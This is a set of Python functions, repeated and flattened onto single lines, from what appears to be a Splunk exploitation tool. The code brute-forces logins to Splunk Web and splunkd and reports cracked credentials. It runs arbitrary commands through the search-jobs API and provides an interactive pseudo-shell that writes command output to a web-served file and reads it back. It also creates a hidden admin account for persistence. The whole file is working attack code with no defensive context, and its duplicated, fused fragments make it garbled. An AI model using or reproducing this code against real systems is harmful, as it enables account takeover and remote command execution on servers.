def attempt_login(): if splunk_object.got_admin == 1: return False login_url = "{0}/en-GB/account/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format( cval, username.rstrip(), password.rstrip()) r.rawpostdata("POST", poststr) r.set_custom_cookie(copyglobaljar=1) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("This resource can be found at"): print "[***] Cracked: %s:%s" % (username.rstrip(), password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(), password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin = 1 except Exception as err: print "[i] Error getting auth details", err return (username, password) else: pass
def attempt_login(): # Dont continue if we already have admin if splunk_object.got_admin == 1: return False login_url = "{0}/services/auth/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): print "[***] Cracked: %s:%s\n" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 #print "ADMIN",splunk_object.got_admin splunk_object.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass
def attempt_login(): # Dont continue if we already have admin if splunk_object.got_admin == 1: return False login_url = "{0}/services/auth/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): print "[***] Cracked: %s:%s\n" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 #print "ADMIN",splunk_object.got_admin splunk_object.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass
def search_exploit_cmd(self,command): "Execute commands via search exploit." if self.splunkweb == 1 and self.got_admin: if self.web_authed == 0: self.splunkweb_auth() print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) shell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in shell_req.get_cookiejar(): if "session" in c.name: shell_req.add_header("X-Requested-With","XMLHttpRequest") shell_req.add_header("X-Splunk-Session",c.value) x = shell_req.makerequest() elif self.splunkd == 1 and self.got_admin and self.session_key: print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url)) shell_req.rawpostdata("POST","ui_dispatch_app=search&search={0}&required_field_list=%2A&ui_dispatch_view=flashtimeline&max_count=10000&time_format=%25s.%25Q&latest_time=&status_buckets=300&earliest_time=&auto_cancel=100".format(attack_body)) shell_req.add_header("authorization","Splunk {0}".format(self.session_key)) x = shell_req.makerequest() else: print "Session",self.session_key print "Admin",self.got_admin print "Splunkd",self.splunkd print "[i] Exploit failed. Not connected or access denied"
def attempt_login(): if splunk_object.got_admin == 1: return False login_url = "{0}/en-GB/account/login".format(targeturl.rstrip()) r = Requestobj(login_url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,username.rstrip(),password.rstrip()) r.rawpostdata("POST", poststr) r.set_custom_cookie(copyglobaljar=1) result = r.makerequest() counter.sub() counter.print_remaining() if result.find_data("This resource can be found at"): print "[***] Cracked: %s:%s" % (username.rstrip(),password.rstrip()) try: if splunk_object.user_is_admin(username.rstrip(),password.rstrip()): splunk_object.username = username.rstrip() splunk_object.password = password.rstrip() splunk_object.got_admin =1 except Exception as err: print "[i] Error getting auth details",err return (username,password) else: pass
def search_exploit_cmd(self,command): "Execute commands via search exploit." if self.splunkweb == 1 and self.got_admin: if self.web_authed == 0: self.splunkweb_auth() print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) shell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in shell_req.get_cookiejar(): if "session" in c.name: shell_req.add_header("X-Requested-With","XMLHttpRequest") shell_req.add_header("X-Splunk-Session",c.value) x = shell_req.makerequest() elif self.splunkd == 1 and self.got_admin and self.session_key: print "[i] Executing Command:{0}".format(command) attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url)) shell_req.rawpostdata("POST","ui_dispatch_app=search&search={0}&required_field_list=%2A&ui_dispatch_view=flashtimeline&max_count=10000&time_format=%25s.%25Q&latest_time=&status_buckets=300&earliest_time=&auto_cancel=100".format(attack_body)) shell_req.add_header("authorization","Splunk {0}".format(self.session_key)) x = shell_req.makerequest() else: print "Session",self.session_key print "Admin",self.got_admin print "Splunkd",self.splunkd print "[i] Exploit failed. Not connected or access denied"
def search_exploit_psudoshell(self): "Execute commands via search exploit. Payload implements a virtual shell" if not self.username or not self.password: print("[i] Valid username and password required") sys.exit() if not self.splunkweb == 1: print("[error] Managment Web Interface required for this payload") return "" if self.web_authed == 0: self.splunkweb_auth() base_dir = self.get_splunk_home() #if not base_dir: # print "Failed to get splunk basedir" # base_dir = "/opt/splunk" command = "" while 1: print(command.rstrip()) command = input("shell>") # if command.rstrip() == "exit": break if "windows" in self.os_name.lower(): tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format( base_dir) command = command + tmp #'"'+ tmp +'"' else: tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format( base_dir) command = command + tmp attack_body = self.search_payload_cmd(command) # attack_body = urllib.parse.quote(urllib.parse.unquote(attack_body)) psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format( self.splunkweb_url)) psudoshell_req.rawpostdata( "POST", "search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=" .format(attack_body)) for c in psudoshell_req.get_cookiejar(): if "session" in c.name: psudoshell_req.add_header("X-Requested-With", "XMLHttpRequest") psudoshell_req.add_header("X-Splunk-Session", c.value) x = psudoshell_req.makerequest() import time time.sleep(3) print( Requestobj("{0}/en-US/static/@105575/js/.tmp".format( self.splunkweb_url)).makerequest().body)
def add_admin(self,username,password,sessionKey): # look for 201 if self.splunkd == 1 and self.username and self.password: url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url)) url.basic_auth(self.username,self.password) url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password)) url.add_header("authorization","Splunk {0}".format(sessionKey)) result = url.makerequest() if str(result.code) == "201": return True else: return False else: print "[!] Not connected to splunkd. Check port and creds" return False
def splunkd_auth(self): login_url = "{0}/services/auth/login".format(self.splunkd_url) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): self.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] return True else: return False
def add_admin(self,username,password,sessionKey): # look for 201 if self.splunkd == 1 and self.username and self.password: url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url)) url.basic_auth(self.username,self.password) url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password)) url.add_header("authorization","Splunk {0}".format(sessionKey)) result = url.makerequest() if str(result.code) == "201": return True else: return False else: print "[!] Not connected to splunkd. Check port and creds" return False
def splunkd_auth(self): login_url = "{0}/services/auth/login".format(self.splunkd_url) r = Requestobj(login_url) poststr = "username={0}&password={1}".format(self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("Remote login disabled because you are using a free license"): print "[i] Free licence in use. No remote login required" print "[!] run the exploit again with the -f flag" sys.exit() if result.find_data("sessionKey"): self.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0] return True else: return False
def search_exploit_psudoshell(self): "Execute commands via search exploit. Payload implements a virtual shell" if not self.username or not self.password: print "[i] Valid username and password required" sys.exit() if not self.splunkweb == 1: print "[error] Managment Web Interface required for this payload" return "" if self.web_authed == 0: self.splunkweb_auth() base_dir = self.get_splunk_home() #if not base_dir: # print "Failed to get splunk basedir" # base_dir = "/opt/splunk" command="" while 1: print command.rstrip() command=raw_input("shell>")# if command.rstrip() == "exit": break if "windows" in self.os_name.lower(): tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format(base_dir) command = command + tmp #'"'+ tmp +'"' else: tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format(base_dir) command = command + tmp attack_body = self.search_payload_cmd(command)# attack_body = urllib.quote(urllib.unquote(attack_body)) psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url)) psudoshell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body)) for c in psudoshell_req.get_cookiejar(): if "session" in c.name: psudoshell_req.add_header("X-Requested-With","XMLHttpRequest") psudoshell_req.add_header("X-Splunk-Session",c.value) x = psudoshell_req.makerequest() import time time.sleep(3) print Requestobj("{0}/en-US/static/@105575/js/.tmp".format(self.splunkweb_url)).makerequest().body
def splunkweb_auth(self): if self.web_authed == 1: return True login_page = Requestobj("{0}/en-GB/account/login".format(self.splunkweb_url)).makerequest() # Get session cookie cval="" cval = login_page.extract_data_body('name="cval" value="(\d+?)"') if cval: cval = cval[0] r = Requestobj(login_page.url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("This resource can be found at"): return True self.web_authed = 1 else: print "[i] Login Failed" exit()
def splunkweb_auth(self): if self.web_authed == 1: return True login_page = Requestobj("{0}/en-GB/account/login".format(self.splunkweb_url)).makerequest() # Get session cookie cval="" cval = login_page.extract_data_body('name="cval" value="(\d+?)"') if cval: cval = cval[0] r = Requestobj(login_page.url) poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,self.username.rstrip(),self.password.rstrip()) r.rawpostdata("POST", poststr) result = r.makerequest() if result.find_data("This resource can be found at"): return True self.web_authed = 1 else: print "[i] Login Failed" exit()